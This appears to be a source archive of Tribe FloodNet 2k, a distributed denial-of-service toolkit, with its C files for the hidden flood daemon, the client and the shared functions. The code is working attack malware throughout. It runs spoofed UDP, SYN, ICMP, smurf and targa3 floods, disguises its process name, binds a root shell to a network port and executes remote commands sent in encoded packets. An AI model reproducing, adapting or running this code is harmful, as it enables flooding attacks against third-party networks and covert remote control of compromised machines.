"\x5f\x63\x32\x34\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x32\x34\x5d" "\x20\x3d\x20\x5f\x63\x32\x35\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b" "\x32\x35\x5d\x20\x3d\x20\x5f\x63\x32\x36\x20\x2d\x20\x61\x6c\x3b\x0a\x20" "\x68\x69\x5b\x32\x36\x5d\x20\x3d\x20\x5f\x63\x32\x37\x20\x2d\x20\x61\x6c" "\x3b\x0a\x20\x68\x69\x5b\x32\x37\x5d\x20\x3d\x20\x5f\x63\x32\x38\x20\x2d" "\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x32\x38\x5d\x20\x3d\x20\x5f\x63\x32" "\x39\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x32\x39\x5d\x20\x3d\x20" "\x5f\x63\x33\x30\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x33\x30\x5d" "\x20\x3d\x20\x5f\x63\x33\x31\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b" "\x33\x31\x5d\x20\x3d\x20\x5f\x63\x33\x32\x20\x2d\x20\x61\x6c\x3b\x0a\x20" "\x61\x65\x73\x5f\x73\x65\x74\x6b\x65\x79\x28\x68\x69\x29\x3b\x0a\x20\x7d" "\x0a\x7d\x0a"; int main (void) { char al, *p, c[32], buf[64]; int i, fd; memset (c, 0, sizeof (c)); srand (getpid ()); al = (rand () % 40) + 1; dufus: p = getpass ("server key [8 - 32 chars]: "); #ifdef DEBUG_INSECURE printf ("Your password is '%s'.\n", p); #endif if ((strlen (p) > 32) || (strlen (p) < 8)) goto dufus; for (i = 0; i <= strlen (p); i++) c[i] = p[i]; fd = open ("pass.c", O_WRONLY | O_TRUNC | O_CREAT); write (fd, header, strlen (header)); for (i = 0; i < 31; i++) { memset (buf, 0, 64); sprintf (buf, " _c%d = %d + %d,\n", i + 1, c[i], al); write (fd, buf, strlen (buf)); } memset (buf, 0, 64); sprintf (buf, " _c32 = %d + %d;\n\n", c[31], al); write (fd, buf, strlen (buf)); memset (buf, 0, 64); sprintf (buf, " int al = %d;\n\n", al); write (fd, buf, strlen (buf)); memset (buf, 0, 64); write (fd, function, strlen (function)); close (fd); printf ("compiling server with %d byte password...\n", strlen (c)); return (0); } tfn2k/src/process.c100644 0 0 15547 7026540160 12626 0ustar rootroot/* * Tribe FloodNet - 2k edition * by Mixter * * process.c - flood / shell server thread management * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */ #include "tribe.h" unsigned long myip = 2130706433; /* 127.0.0.1 network byte ordered */ extern int fw00ding, nospoof, rawsock; int pid[CHLD_MAX + 5]; void shellsex (int port) { int s1, s2, s3; struct sa s_a, c_a; if (fork ()) return; setuid (0); setgid (0); #ifndef WINDOZE setreuid (0, 0); setregid (0, 0); #endif s1 = socket (AF_INET, SOCK_STREAM, TCP); bzero ((char *) &s_a, sizeof (s_a)); s_a.fam = AF_INET; s_a.add = htonl (INADDR_ANY); s_a.dp = htons (port); if (bind (s1, (struct sockaddr *) &s_a, sizeof (s_a)) < 0) exit (0); if (listen (s1, 1) < 0) exit (0); while (1) { s3 = sizeof (c_a); s2 = accept (s1, (struct sockaddr *) &c_a, &s3); dup2 (s2, 0); dup2 (s2, 1); dup2 (s2, 2); #ifndef WINDOZE if (execlp ("sh", "sh", (char *) 0) < 0) execlp ("ksh", "ksh", (char *) 0); /* yech, no sh */ #else if (execlp ("command.exe", "command.exe", (char *) 0) < 0) execlp ("cmd.exe", "cmd.exe", (char *) 0); /* yech, windoze neanderthal technology */ #endif close (s2); return; } } void commence_udp (char *ip) { int i = -1, p; unsigned long resolved = 0; char *parse; if ((parse = strtok (ip, DELIMITER)) == NULL) { fw00ding = 0; return; } while ((parse != NULL) && (i++ < CHLD_MAX)) { resolved = resolve (parse); p = fork (); if (!p) { rawsock = socket (AF_INET, SOCK_RAW, RAW); if (rawsock < 0) rawsock = socket (AF_INET, SOCK_RAW, UDP); setsockopt (rawsock, IP, IP_HDRINCL, "1", sizeof ("1")); if (resolved == -1) exit (0); while (1) udp (resolved); } #ifdef ATTACKLOG { char tmp[100]; sprintf (tmp, "PID %d forking (#%d), child (%d) attacks %s, UDP\n" ,getpid (), i, p, parse); dbug (tmp); } #endif pid[i] = p; parse = strtok (NULL, DELIMITER); } } void commence_syn (char *ip, int port) { int i = -1, p; unsigned long resolved = 0; char *parse; if ((parse = strtok (ip, DELIMITER)) == NULL) { fw00ding = 0; return; } while ((parse != NULL) && (i++ < CHLD_MAX)) { resolved = resolve (parse); p = fork (); if (!p) { rawsock = socket (AF_INET, SOCK_RAW, RAW); if (rawsock < 0) rawsock = socket (AF_INET, SOCK_RAW, TCP); setsockopt (rawsock, IP, IP_HDRINCL, "1", sizeof ("1")); if (resolved == -1) exit (0); while (1) syn (resolved, port); } #ifdef ATTACKLOG { char tmpbuf[100]; sprintf (tmpbuf, "PID %d forking (#%d), child (%d) attacks %s, SYN\n" ,getpid (), i, p, parse); dbug (tmpbuf); } #endif pid[i] = p; parse = strtok (NULL, DELIMITER); } } void commence_icmp (char *ip) { int i = -1, p; unsigned long resolved = 0; char *parse; if ((parse = strtok (ip, DELIMITER)) == NULL) { fw00ding = 0; return; } while ((parse != NULL) && (i++ < CHLD_MAX)) { resolved = resolve (parse); p = fork (); if (!p) { rawsock = socket (AF_INET, SOCK_RAW, RAW); if (rawsock < 0) rawsock = socket (AF_INET, SOCK_RAW, ICMP); setsockopt (rawsock, IP, IP_HDRINCL, "1", sizeof ("1")); if (resolved == -1) exit (0); while (1) icmp (resolved, 0); } #ifdef ATTACKLOG { char tmpbuf[100]; sprintf (tmpbuf, "PID %d forking (#%d), child (%d) attacks %s, ICMP\n" ,getpid (), i, p, parse); dbug (tmpbuf); } #endif pid[i] = p; parse = strtok (NULL, DELIMITER); } } void commence_mix (char *ip) { int i = -1, p; unsigned long resolved = 0; char *parse; if ((parse = strtok (ip, DELIMITER)) == NULL) { fw00ding = 0; return; } while ((parse != NULL) && (i++ < CHLD_MAX)) { resolved = resolve (parse); p = fork (); if (!p) { rawsock = socket (AF_INET, SOCK_RAW, RAW); if (rawsock < 0) rawsock = socket (AF_INET, SOCK_RAW, IP); setsockopt (rawsock, IP, IP_HDRINCL, "1", sizeof ("1")); if (resolved == -1) exit (0); while (1) { icmp (resolved, 0); syn (resolved, 0); udp (resolved); } } #ifdef ATTACKLOG { char tmpbuf[100]; sprintf (tmpbuf, "PID %d forking (#%d), child (%d) attacks %s, MIX\n" ,getpid (), i, p, parse); dbug (tmpbuf); } #endif pid[i] = p; parse = strtok (NULL, DELIMITER); } } void commence_smurf (char *ip) { int i = -1, p; unsigned long bcast, resolved = 0; char *parse; if ((parse = strtok (ip, DELIMITER)) == NULL) { fw00ding = 0; return; } resolved = resolve (parse); if (resolved == -1) { fw00ding = 0; return; } if ((parse = strtok (NULL, DELIMITER)) == NULL) { fw00ding = 0; return; } while ((parse != NULL) && (i++ < CHLD_MAX)) { bcast = resolve (parse); p = fork (); if (!p) { rawsock = socket (AF_INET, SOCK_RAW, RAW); if (rawsock < 0) rawsock = socket (AF_INET, SOCK_RAW, ICMP); setsockopt (rawsock, IP, IP_HDRINCL, "1", sizeof ("1")); if (resolved == -1) exit (0); while (1) icmp (resolved, bcast); } #ifdef ATTACKLOG { char tmpbuf[100]; sprintf (tmpbuf, "PID %d forking (#%d), child (%d) attack-bcast %s, SMURF\n" ,getpid (), i, p, parse); dbug (tmpbuf); } #endif pid[i] = p; parse = strtok (NULL, DELIMITER); } } void commence_targa3 (char *ip) { int i = -1, p; unsigned long resolved = 0; char *parse; if ((parse = strtok (ip, DELIMITER)) == NULL) { fw00ding = 0; return; } while ((parse != NULL) && (i++ < CHLD_MAX)) { resolved = resolve (parse); p = fork (); if (!p) { rawsock = socket (AF_INET, SOCK_RAW, RAW); if (rawsock < 0) rawsock = socket (AF_INET, SOCK_RAW, 0); setsockopt (rawsock, IP, IP_HDRINCL, "1", sizeof ("1")); if (resolved == -1) exit (0); while (1) targa3 (resolved); } #ifdef ATTACKLOG { char tmpbuf[100]; sprintf (tmpbuf, "PID %d forking (#%d), child (%d) attacks %s, TARGA3\n" ,getpid (), i, p, parse); dbug (tmpbuf); } #endif pid[i] = p; parse = strtok (NULL, DELIMITER); } } void must_kill_all (void) { int i; for (i = 0; i <= CHLD_MAX - 1; i++) { #ifdef ATTACKLOG char tmp[100]; if (pid[i] < 2) break; /* killing -1 or 0 != fun :) */ sprintf (tmp, "Killing flood pid (#%d): %d\n", i, pid[i]); dbug (tmp); kill (pid[i], 9); #else if (pid[i] < 2) break; /* killing -1 or 0 != fun :) */ kill (pid[i], 9); #endif } } tfn2k/src/td.c100644 0 0 13242 7026540160 11545 0ustar rootroot/* * Tribe FloodNet - 2k edition * by Mixter * * td.c - tribe flood server * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */ #include "tribe.h" extern int fw00ding, nospoof, port4syn, psize; extern unsigned long myip; extern void security_through_obscurity (int); void tribe_cmd (char, char *, char **); int main (int argc, char **argv) { char buf[BS], clear[BS]; struct ip *iph = (struct ip *) buf; struct tribe *tribeh = (struct tribe *) clear; int isock, tsock, usock, i; char *p = NULL, *data = (clear + sizeof (struct tribe)); fd_set rfds; isock = socket (AF_INET, SOCK_RAW, ICMP); tsock = socket (AF_INET, SOCK_RAW, TCP); usock = socket (AF_INET, SOCK_RAW, UDP); if (geteuid ()) exit (-1); memset (argv[0], 0, strlen (argv[0])); strcpy (argv[0], HIDEME); close (0); close (1); close (2); #ifndef WINDOZE if (fork ()) exit (0); #else switch (fork ()) { case -1: perror ("fork"); exit (0); break; case 0: break; default: break; } #endif signal (SIGHUP, SIG_IGN); signal (SIGTERM, SIG_IGN); signal (SIGCHLD, SIG_IGN); while (1) { FD_ZERO (&rfds); FD_SET (isock, &rfds); FD_SET (usock, &rfds); FD_SET (tsock, &rfds); if (select (usock + 1, &rfds, NULL, NULL, NULL) < 1) continue; if (FD_ISSET (isock, &rfds)) { i = read (isock, buf, BS) - (sizeof (struct ip) + sizeof (struct icmp)); myip = htonl (iph->dst); if (i < 4) continue; p = (buf + sizeof (struct ip) + sizeof (struct icmp)); if (!isprint (p[0])) continue; memset (clear, 0, BS); security_through_obscurity (1); decode64 (p, clear, i); memset (buf, 0, BS); security_through_obscurity (0); if ((tribeh->start == PROTO_SEP) && (tribeh->end == PROTO_SEP)) tribe_cmd (tribeh->id, data, argv); } if (FD_ISSET (tsock, &rfds)) { i = read (tsock, buf, BS) - (sizeof (struct ip) + sizeof (struct tcp)); myip = htonl (iph->dst); if (i < 4) continue; p = (buf + sizeof (struct ip) + sizeof (struct tcp)); if (!isprint (p[0])) continue; memset (clear, 0, BS); security_through_obscurity (1); decode64 (p, clear, i); memset (buf, 0, BS); security_through_obscurity (0); if ((tribeh->start == PROTO_SEP) && (tribeh->end == PROTO_SEP)) tribe_cmd (tribeh->id, data, argv); } if (FD_ISSET (usock, &rfds)) { i = read (usock, buf, BS) - (sizeof (struct ip) + sizeof (struct udp)); myip = htonl (iph->dst); if (i < 4) continue; p = (buf + sizeof (struct ip) + sizeof (struct udp)); if (!isprint (p[0])) continue; memset (clear, 0, BS); security_through_obscurity (1); decode64 (p, clear, i); memset (buf, 0, BS); security_through_obscurity (0); if ((tribeh->start == PROTO_SEP) && (tribeh->end == PROTO_SEP)) tribe_cmd (tribeh->id, data, argv); } } /* 1 != 1 */ return (0); } void tribe_cmd (char id, char *target, char **argp) { #ifdef ATTACKLOG { char tmp[BS]; sprintf (tmp, "PID %d CMD '%c' TARGET %s\n" ,getpid (), id, target); dbug (tmp); } #endif switch (id) { case ID_ICMP: if (fw00ding) /* already in progress, ignored */ break; fw00ding = 3; /* commencing ICMP/8 flood */ strcpy (argp[0], HIDEKIDS); commence_icmp (target); strcpy (argp[0], HIDEME); break; case ID_SMURF: if (fw00ding) /* already in progress, ignored */ break; fw00ding = 4; /* commencing SMURF broadcast flood */ strcpy (argp[0], HIDEKIDS); commence_smurf (target); strcpy (argp[0], HIDEME); break; case ID_SENDUDP: if (fw00ding) /* already in progress, ignored */ break; fw00ding = 1; /* commencing UDP flood */ strcpy (argp[0], HIDEKIDS); commence_udp (target); strcpy (argp[0], HIDEME); break; case ID_SENDSYN: if (fw00ding) /* already in progress, ignored */ break; fw00ding = 2; /* commencing SYN flood */ strcpy (argp[0], HIDEKIDS); commence_syn (target, port4syn); strcpy (argp[0], HIDEME); break; case ID_STOPIT: if (!fw00ding) /* this has no longer a meaning */ break; must_kill_all (); /* all flood childs terminating */ usleep (100); fw00ding = 0; break; case ID_SYNPORT: port4syn = atoi (target); /* syn port set */ break; case ID_PSIZE: psize = atoi (target); /* new packet size */ break; case ID_SWITCH: switch (atoi (target)) { case 0: nospoof = 0; /* spoof mask: *.*.*.* */ break; case 1: nospoof = 1; /* spoof mask: real.*.*.* */ break; case 2: nospoof = 2; /* spoof mask: real.real.*.* */ break; case 3: nospoof = 3; /* spoof mask: real.real.real.* */ break; default: break; } break; case ID_SHELL: shellsex (atoi (target)); /* shell bound to target port */ break; case ID_TARGA: if (fw00ding) /* already in progress, ignored */ break; fw00ding = 4; /* commencing targa3 attack */ strcpy (argp[0], HIDEKIDS); commence_targa3 (target); strcpy (argp[0], HIDEME); break; case ID_MIX: if (fw00ding) /* already in progress, ignored */ break; fw00ding = 5; /* commencing interval flood */ strcpy (argp[0], HIDEKIDS); commence_mix (target); strcpy (argp[0], HIDEME); break; case ID_REXEC: system (target); break; default: break; } } tfn2k/src/tfn.c100644 0 0 17115 7026540160 11730 0ustar rootroot/* * Tribe FloodNet - 2k edition * by Mixter * * tfn.c - tribe floodnet client * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */ #include "tribe.h" #define RETRY 20 /* send datagrams x times, 20 is fine */ void usage (char *); void tfn_sendto (unsigned long dst); extern void security_through_obscurity (int); #ifdef REQUIRE_PASS void passchk (void); #endif #ifdef WINDOZE extern char *optarg; int getopt (int, char *const *, const char *); #endif char *target = NULL, *port = NULL, RID = '0'; int nospoof = 0, cid = 0, decoy = 0, proto = -1; unsigned long myip = 0; int main (int argc, char **argv) { FILE *tfnlist = NULL; char nexthost[BS]; unsigned long tfnhost = 0; int opt; if (argc < 2) usage (argv[0]); while ((opt = getopt (argc, argv, "P:D:S:f:h:i:p:c:")) != EOF) switch (opt) { case 'P': if (strcasecmp (optarg, "icmp") == 0) proto = 0; if (strcasecmp (optarg, "udp") == 0) proto = 1; if (strcasecmp (optarg, "tcp") == 0) proto = 2; break; case 'D': decoy = atoi (optarg); break; case 'S': myip = resolve (optarg); break; case 'f': if ((tfnlist = fopen (optarg, "r")) == NULL) { printf ("Unable to open file: %s\n", optarg); usage (argv[0]); } break; case 'h': tfnhost = resolve (optarg); break; case 'i': target = malloc (BS); strncpy (target, optarg, BS); break; case 'p': port = malloc (BS); strncpy (port, optarg, BS); break; case 'c': cid = atoi (optarg); break; default: usage (argv[0]); break; } printf ("\n"); printf ("\tProtocol : "); switch (proto) { case 0: printf ("icmp\n"); break; case 1: printf ("udp\n"); break; case 2: printf ("tcp\n"); break; default: printf ("random\n"); break; } if (decoy) printf ("\tDecoy hosts : %d\n", decoy); if (myip) printf ("\tSource IP : %s\n", ntoa (myip)); else printf ("\tSource IP : random\n"); if (tfnlist != NULL) printf ("\tClient input : list\n"); else if (tfnhost != 0) printf ("\tClient input : single host\n"); else usage (argv[0]); if (port != NULL) printf ("\tTCP port : %d\n", atoi (port)); else if (cid == 5) { port = malloc (BS); strcpy (port, "0"); } if (target != NULL) { if ((cid > 4) && (cid != 10)) printf ("\tTarget(s) : %s\n", target); } else if (cid) usage (argv[0]); printf ("\tCommand : "); switch (cid) { case 0: RID = ID_STOPIT; printf ("stop flooding\n"); if (target == NULL) { target = malloc (BS); strcpy (target, "0"); } break; case 1: RID = ID_SWITCH; printf ("change spoof level to %d\n", atoi (target)); break; case 2: RID = ID_PSIZE; printf ("change packet size to %d bytes\n", atoi (target)); break; case 3: RID = ID_SHELL; printf ("bind shell(s) to port %d\n", atoi (target)); break; case 4: RID = ID_SENDUDP; printf ("commence udp flood\n"); break; case 5: RID = ID_SENDSYN; printf ("commence syn flood, port: %s\n", atoi (port) ? port : "random"); break; case 6: RID = ID_ICMP; printf ("commence icmp echo flood\n"); break; case 7: RID = ID_SMURF; printf ("commence icmp broadcast (smurf) flood\n"); break; case 8: RID = ID_MIX; printf ("commence mix flood\n"); break; case 9: RID = ID_TARGA; printf ("commence targa3 attack\n"); break; case 10: RID = ID_REXEC; printf ("execute remote command\n"); break; default: printf ("error\n"); usage (argv[0]); break; } #ifdef REQUIRE_PASS passchk (); #endif printf ("\nSending out packets: "); fflush (stdout); security_through_obscurity (1); if (tfnlist == NULL) tfn_sendto (tfnhost); else while (fgets (nexthost, 512, tfnlist) != NULL) { switch (nexthost[0]) { case '\n': case '\r': case ' ': case '#': continue; break; } trimbuf (nexthost); tfnhost = resolve (nexthost); if (tfnhost) tfn_sendto (tfnhost); } printf ("\n"); return 0; } #ifdef REQUIRE_PASS void passchk (void) { char test1[100] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", test2[100] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", enc1[100], enc2[100], *p = getpass ("\nPassword verification:"); memset (enc1, 0, 100); memset (enc2, 0, 100); security_through_obscurity (1); encode64 (test1, enc1, strlen (test1)); security_through_obscurity (0); aes_setkey (p); encode64 (test2, enc2, strlen (test2)); if (strcmp (enc1, enc2)) { fprintf (stderr, "Sorry, passwords do not match.\n"); fprintf (stderr, "1 %s\n2 %s\n", enc1, enc2); exit (0); } } #endif void tfn_sendto (unsigned long dst) { int i, j; char ltarget[BS], lport[BS]; unsigned long src = myip ? myip : k00lip (); for (i = 0; i < RETRY; i++) { if (cid == 5) { strcpy (lport, port); tfntransmit (src, dst, proto, ID_SYNPORT, lport); usleep (666); } strcpy (ltarget, target); tfntransmit (src, dst, proto, RID, ltarget); if (decoy) for (j = 0; j < decoy; j++) { usleep (10); strcpy (ltarget, target); tfntransmit (src, k00lip (), proto, RID, ltarget); } usleep (100); } for (j = 0; j < decoy; j++) printf ("d"); printf ("."); fflush (stdout); } void usage (char *arg) { printf ("usage: %s \n", arg); printf ("[-P protocol]\tProtocol for server communication. Can be ICMP, UDP or TCP.\n\t\tUses a random protocol as default\n"); printf ("[-D n] \tSend out n bogus requests for each real one to decoy targets\n"); printf ("[-S host/ip]\tSpecify your source IP. Randomly spoofed by default, you need\n\t\tto use your real IP if you are behind spoof-filtering routers\n"); printf ("[-f hostlist]\tFilename containing a list of hosts with TFN servers to contact\n"); printf ("[-h hostname]\tTo contact only a single host running a TFN server\n"); printf ("[-i target string]\tContains options/targets separated by '%s', see below\n", DELIMITER); printf ("[-p port] \tA TCP destination port can be specified for SYN floods\n"); printf ("<-c command ID>\t0 - Halt all current floods on server(s) immediately\n"); printf ("\t\t1 - Change IP antispoof-level (evade rfc2267 filtering)\n\t\t usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)\n"); printf ("\t\t2 - Change Packet size, usage: -i \n"); printf ("\t\t3 - Bind root shell to a port, usage: -i \n"); printf ("\t\t4 - UDP flood, usage: -i victim%svictim2%svictim3%s...\n", DELIMITER, DELIMITER, DELIMITER); printf ("\t\t5 - TCP/SYN flood, usage: -i victim%s... [-p destination port]\n", DELIMITER); printf ("\t\t6 - ICMP/PING flood, usage: -i victim%s...\n", DELIMITER); printf ("\t\t7 - ICMP/SMURF flood, usage: -i victim%sbroadcast%sbroadcast2%s...\n", DELIMITER, DELIMITER, DELIMITER); printf ("\t\t8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim%s...\n", DELIMITER); printf ("\t\t9 - TARGA3 flood (IP stack penetration), usage: -i victim%s...\n", DELIMITER); printf ("\t\t10 - Blindly execute remote shell command, usage -i command\n"); printf (""); exit (0); } tfn2k/src/tribe.c100644 0 0 11217 7026540160 12243 0ustar rootroot/* * Tribe FloodNet - 2k edition * by Mixter * * tribe.c - common functions * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */ #include "tribe.h" int rcounter = 0; char rseed[65535]; extern unsigned long myip; extern int nospoof; void random_init (void) { int rfd = open ("/dev/urandom", O_RDONLY); if (rfd < 0) rfd = open ("/dev/random", O_RDONLY); rcounter = read (rfd, rseed, 65535); close (rfd); } inline long getrandom (int min, int max) { if (rcounter < 2) random_init (); srand (rseed[rcounter] + (rseed[rcounter - 1] << 8)); rcounter -= 2; return ((random () % (int) (((max) + 1) - (min))) + (min)); } void trimbuf (char *buf) { int i = 0; for (i = 0; i < strlen (buf); i++) if ((buf[i] == '\n') || (buf[i] == '\r')) buf[i] = '\0'; } inline unsigned long k00lip (void) { struct in_addr hax0r; char convi[16]; int a, b, c, d; if (nospoof < 1) return (unsigned long) (getrandom (0, 65535) + (getrandom (0, 65535) << 8)); hax0r.s_addr = htonl (myip); sscanf (inet_ntoa (hax0r), "%d.%d.%d.%d", &a, &b, &c, &d); if (nospoof < 2) b = getrandom (1, 254); if (nospoof < 3) c = getrandom (1, 254); d = getrandom (1, 254); sprintf (convi, "%d.%d.%d.%d", a, b, c, d); return inet_addr (convi); } void tfntransmit (unsigned long from, unsigned long to, int proto, char id, char *target) { char buf[BS], data[BS]; struct ip *ih = (struct ip *) buf; struct icmp *ich = (struct icmp *) (buf + sizeof (struct ip)); struct udp *udh = (struct udp *) (buf + sizeof (struct ip)); struct tcp *tch = (struct tcp *) (buf + sizeof (struct ip)); struct sa sin; char *p; int tot_len = sizeof (struct ip), ssock; memset (data, 0, BS); data[0] = PROTO_SEP; data[1] = id; data[2] = PROTO_SEP; strncpy (data + 3, target, BS - 3); sin.fam = AF_INET; sin.add = to; memset (buf, 0, BS); ih->ver = 4; ih->ihl = 5; ih->tos = 0x00; ih->tl = 0; ih->id = htons (getrandom (1024, 65535)); ih->off = 0; ih->ttl = getrandom (200, 255); ih->sum = 0; ih->src = from; ih->dst = to; switch ((proto == -1) ? getrandom (0, 2) : proto) { case 0: tot_len += sizeof (struct icmp); ih->pro = ICMP; ssock = socket (AF_INET, SOCK_RAW, ICMP); p = buf + sizeof (struct ip) + sizeof (struct icmp); ich->type = 0; ich->code = 0; ich->id = getrandom (0, 1) ? getrandom (0, 65535) : 0; ich->seq = getrandom (0, 1) ? getrandom (0, 65535) : 0; ich->sum = 0; encode64 (data, p, strlen (data)); tot_len += strlen (p); ich->sum = cksum ((u16 *) ich, tot_len >> 1); ih->tl = tot_len; sin.dp = htons (0); break; case 1: tot_len += sizeof (struct udp); ih->pro = UDP; ssock = socket (AF_INET, SOCK_RAW, UDP); p = buf + sizeof (struct ip) + sizeof (struct udp); udh->src = htons (getrandom (0, 65535)); udh->dst = htons (getrandom (0, 65535)); udh->sum = 0; encode64 (data, p, strlen (data)); tot_len += strlen (p); udh->sum = cksum ((u16 *) udh, tot_len >> 1); udh->len = htons (sizeof (struct udp) + 3 + strlen (p)); ih->tl = tot_len; sin.dp = htons (udh->dst); break; case 2: tot_len += sizeof (struct tcp); ih->pro = TCP; ssock = socket (AF_INET, SOCK_RAW, TCP); p = buf + sizeof (struct ip) + sizeof (struct tcp); tch->src = htons (getrandom (0, 65535)); tch->dst = htons (getrandom (0, 65535)); tch->seq = getrandom (0, 1) ? htonl (getrandom (0, 65535) + (getrandom (0, 65535) << 8)) : 0; tch->ack = getrandom (0, 1) ? htonl (getrandom (0, 65535) + (getrandom (0, 65535) << 8)) : 0; tch->off = 0; tch->flg = getrandom (0, 1) ? (getrandom (0, 1) ? SYN : ACK) : SYN | ACK; tch->win = getrandom (0, 1) ? htons (getrandom (0, 65535)) : 0; tch->urp = 0; tch->sum = 0; encode64 (data, p, strlen (data)); tot_len += strlen (p); tch->sum = cksum ((u16 *) tch, tot_len >> 1); ih->tl = tot_len; sin.dp = htons (tch->dst); break; default: exit (0); break; } setsockopt (ssock, IP, IP_HDRINCL, "1", sizeof ("1")); if (sendto (ssock, buf, tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0) perror ("sendto"); close (ssock); } #ifdef ATTACKLOG void dbug (char *s) { int f = open (ATTACKLOG, O_WRONLY | O_APPEND | O_CREAT); write (f, s, strlen (s)); close (f); } #endif tfn2k/src/tribe.h100644 0 0 3767 7026540160 12243 0ustar rootroot/* * Tribe FloodNet - 2k edition * by Mixter * * tribe.c - common definitions and includes * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */ #ifndef TRIBE_H #define TRIBE_H #include #include #include #include #include #include #include #include #include #include int rand (void); /* standard function prototypes */ long int random (void); void srandom (unsigned int seed); void srand (unsigned int seed); int atoi (const char *nptr); int system (const char *string); char *getpass (const char *prompt); char *strtok (char *s, const char *delim); void *calloc (size_t nmemb, size_t size); void *malloc (size_t size); void free (void *ptr); void bzero (void *s, int n); void *memset (void *s, int c, size_t n); char *strncpy (char *dest, const char *src, size_t n); int strcasecmp (const char *s1, const char *s2); #include "ip.h" #include "aes.h" #include "config.h" //char shameless_self_promotion[] = "\t\t[tribe flood network]\t (c) 1999 by Mixter\n\n"; #define BS 4096 void random_init (void); inline long getrandom (int, int); void trimbuf (char *); #ifdef ATTACKLOG void dbug (char *); #endif void tfntransmit (unsigned long, unsigned long, int, char, char *); void syn (unsigned long, unsigned short); void udp (unsigned long); void targa3 (unsigned long); void icmp (unsigned long, unsigned long); inline unsigned long k00lip (void); void must_kill_all (void); void commence_udp (char *); void commence_syn (char *, int); void commence_icmp (char *); void commence_mix (char *); void commence_smurf (char *); void commence_targa3 (char *); void shellsex (int); struct tribe { char start; char id; char end; }; #endif